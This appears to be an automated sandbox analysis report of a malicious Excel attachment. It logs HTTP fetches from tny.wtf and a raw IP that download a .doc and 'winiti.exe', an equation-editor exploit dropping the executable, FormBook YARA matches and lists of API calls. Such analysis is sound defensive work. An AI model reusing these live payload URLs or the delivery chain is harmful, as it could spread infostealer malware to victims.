00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd 95 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 04 05 01 00 4c 55 00 00 03 00 00 00 49 00 00 06 50 5a 01 00 d8 12 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 2a c2 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 02 03 7d 01 00 00 04 2a 00 1b 30 03 00 82 00 00 00 01 00 00 11 00 14 0a 00 72 03 00 00 70 73 16 00 00 0a 0a 06 6f 17 00 00 0a 00 72 ba 00 00 70 0b 07 06 73 18 00 00 0a 0c 73 19 00 00 0a 0d 08 73 1a 00 00 0a 13 04 11 04 09 6f 1b 00 00 0a 26 02 09 6f 1c 00 00 0a 16 6f 1d 00 00 0a 7d 04 00 00 04 02 7b 06 00 00 04 02 7b 04 00 00 04 6f 1e 00 00 0a 00 00 de 13 13 05 00 11 05 6f 1f 00 00 0a 28 20 00 00 0a 26 00 de 00 de 0a 00 06 6f 21 00 00 0a 00 00 dc 2a 00 00 01 1c 00 00 00 00 03 00 5f 62 00 13 20 00 00 01 02 00 03 00 74 77 00 0a 00 00 00 00 13 30 04 00 c2 00 00 00 02 00 00 11 00 02 7b 07 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: DATAWAGONUS DATAWAGONUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: GET /dGa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\618F8639.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /dGa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: tny.wtf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 09:07:13 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmVL%2B9Ij5x9y%2F3Ryt%2F%2B8wVe%2FJf89vur2PUoFzBwq%2BhKVE%2B971DuKKd4%2FAxAMf90de2Dc1s4PpEY6I6cjg4CVj4STv%2FMod5sQvbO0gthym9fJa8SonoCMJVYp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a933cf9f96f43aa-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 09:07:15 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2B%2BpXjTQyBLo%2Bvl14dRKuLT%2Btdqr9KVmq5wbTz3TUPpgSwvrNve5b4kGa%2FHasnFjyhtElKH6%2FVCoWBFZoU332quVLf0D07BbNKXhaxTL3RUzsDaXeT1Ket6X"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a933d034ebc43aa-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 09:07:15 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BP%2FoNZFsu5NoJ2VHc8FLC37%2FXnlTwEwtM0nXnI%2F7U40Kzm4UI5cYplLfaeHiXSnnXM8BCCIaM2ls6YL1f4sfEySGyCjl64RzWajeO7SNy%2BZEIbDF8CoOgWXL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a933d044f4843aa-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 09:07:19 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASSs5oNO7KlkDaxt8lzsY7zELo7mEgZGYmKo1tZooPCsbG9KH7DT4ibwma6%2BzSACTQVswG%2BTcw9iyHWbQj9K28AICJ32Y8M%2FwHf70oS%2F25VESXW4lVWqlCNX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a933d201c5a4338-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 09:07:19 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASSs5oNO7KlkDaxt8lzsY7zELo7mEgZGYmKo1tZooPCsbG9KH7DT4ibwma6%2BzSACTQVswG%2BTcw9iyHWbQj9K28AICJ32Y8M%2FwHf70oS%2F25VESXW4lVWqlCNX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a933d201c5a4338-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 09:08:21 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TsjIlU1hx5fa%2BVMyLkPmD6JFcksZgmIHlWwiGUYIs%2FZUQP%2BkwJ3xsm5LWw0yy6tSKpvOkPzMYHnFNgNoG1NFA1JvqtFlPjChQdh46WuXq1bK7G5jGWZm2Qbk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a933ea469e580d0-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 09:08:21 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TsjIlU1hx5fa%2BVMyLkPmD6JFcksZgmIHlWwiGUYIs%2FZUQP%2BkwJ3xsm5LWw0yy6tSKpvOkPzMYHnFNgNoG1NFA1JvqtFlPjChQdh46WuXq1bK7G5jGWZm2Qbk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a933ea469e580d0-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: EQNEDT32.EXE, 00000008.00000002.441287164.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exe
                Source: EQNEDT32.EXE, 00000008.00000002.441287164.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exej
                Source: EQNEDT32.EXE, 00000008.00000002.441287164.00000000002FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exekkC:
                Source: tny.wtf.url.4.drString found in binary or memory: http://tny.wtf/
                Source: RFQ#51281AOLAI.xls, dGa.url.4.drString found in binary or memory: http://tny.wtf/dGa
                Source: ~DFFE8567877254EA13.TMP.0.dr, 1E630000.0.drString found in binary or memory: http://tny.wtf/dGayX

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 10.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 10.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1804222C.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Excel sheet contains many unusual embedded objects
                Source: RFQ#51281AOLAI.xlsOLE: Microsoft Excel 2007+
                Source: 1E630000.0.drOLE: Microsoft Excel 2007+
                Source: ~DFB487D2232F45372D.TMP.0.drOLE: Microsoft Excel 2007+
                Microsoft Office drops suspicious files
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dGa.urlJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.urlJump to behavior
                Office equation editor drops PE file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0042BEE3 NtClose,10_2_0042BEE3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C07AC NtCreateMutant,LdrInitializeThunk,10_2_008C07AC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BF9F0 NtClose,LdrInitializeThunk,10_2_008BF9F0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk,10_2_008BFAE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk,10_2_008BFB68
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk,10_2_008BFDC0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C00C4 NtCreateFile,10_2_008C00C4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C0048 NtProtectVirtualMemory,10_2_008C0048
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C0060 NtQuerySection,10_2_008C0060
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C0078 NtResumeThread,10_2_008C0078
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C01D4 NtSetValueKey,10_2_008C01D4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C010C NtOpenDirectoryObject,10_2_008C010C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C0C40 NtGetContextThread,10_2_008C0C40
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C10D0 NtOpenProcessToken,10_2_008C10D0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C1148 NtOpenThread,10_2_008C1148
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BF8CC NtWaitForSingleObject,10_2_008BF8CC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BF900 NtReadFile,10_2_008BF900
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BF938 NtWriteFile,10_2_008BF938
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C1930 NtSetContextThread,10_2_008C1930
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFAB8 NtQueryValueKey,10_2_008BFAB8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFAD0 NtAllocateVirtualMemory,10_2_008BFAD0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFA20 NtQueryInformationFile,10_2_008BFA20
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFA50 NtEnumerateValueKey,10_2_008BFA50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFBB8 NtQueryInformationToken,10_2_008BFBB8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFBE8 NtQueryVirtualMemory,10_2_008BFBE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFB50 NtCreateKey,10_2_008BFB50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFC90 NtUnmapViewOfSection,10_2_008BFC90
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFC30 NtOpenProcess,10_2_008BFC30
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFC48 NtSetInformationFile,10_2_008BFC48
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFC60 NtMapViewOfSection,10_2_008BFC60
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFD8C NtDelayExecution,10_2_008BFD8C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008C1D80 NtSuspendThread,10_2_008C1D80
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFD5C NtEnumerateKey,10_2_008BFD5C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFEA0 NtReadVirtualMemory,10_2_008BFEA0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFED0 NtAdjustPrivilegesToken,10_2_008BFED0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFE24 NtWriteVirtualMemory,10_2_008BFE24
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFFB4 NtCreateSection,10_2_008BFFB4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFFFC NtCreateProcessEx,10_2_008BFFFC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008BFF34 NtQueueApcThread,10_2_008BFF34
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0030811C8_2_0030811C
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_003083548_2_00308354
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0030EB5C8_2_0030EB5C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_002E04C89_2_002E04C8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_002E3D989_2_002E3D98
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_002E11689_2_002E1168
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_002E3B389_2_002E3B38
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00721DE89_2_00721DE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_007219C09_2_007219C0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_007219B19_2_007219B1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_007222309_2_00722230
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_007222209_2_00722220
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00722B509_2_00722B50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_007227109_2_00722710
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_007227189_2_00722718
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0040142010_2_00401420
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0040100010_2_00401000
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0040115410_2_00401154
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0040116010_2_00401160
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00416A4E10_2_00416A4E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00416A5310_2_00416A53
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0040FCCB10_2_0040FCCB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0040FCD310_2_0040FCD3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0042E52310_2_0042E523
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0040FEF310_2_0040FEF3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0040DF7310_2_0040DF73
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00402FD010_2_00402FD0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008CE0C610_2_008CE0C6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008CE2E910_2_008CE2E9
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_009763BF10_2_009763BF
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008F63DB10_2_008F63DB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008D230510_2_008D2305
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0091A37B10_2_0091A37B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0095443E10_2_0095443E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_009505E310_2_009505E3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008EC5F010_2_008EC5F0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0091654010_2_00916540
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008D468010_2_008D4680
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008DE6C110_2_008DE6C1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0091A63410_2_0091A634
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0097262210_2_00972622
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008DC7BC10_2_008DC7BC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008DC85C10_2_008DC85C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008F286D10_2_008F286D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0097098E10_2_0097098E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008D29B210_2_008D29B2
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_009649F510_2_009649F5
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008E69FE10_2_008E69FE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0091C92010_2_0091C920
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0097CBA410_2_0097CBA4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00956BCB10_2_00956BCB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00972C9C10_2_00972C9C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0095AC5E10_2_0095AC5E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00900D3B10_2_00900D3B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008DCD5B10_2_008DCD5B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00902E2F10_2_00902E2F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008EEE4C10_2_008EEE4C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0096CFB110_2_0096CFB1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00942FDC10_2_00942FDC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008E0F3F10_2_008E0F3F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008FD00510_2_008FD005
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008D304010_2_008D3040
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008E905A10_2_008E905A
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0094D06D10_2_0094D06D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_0095D13F10_2_0095D13F
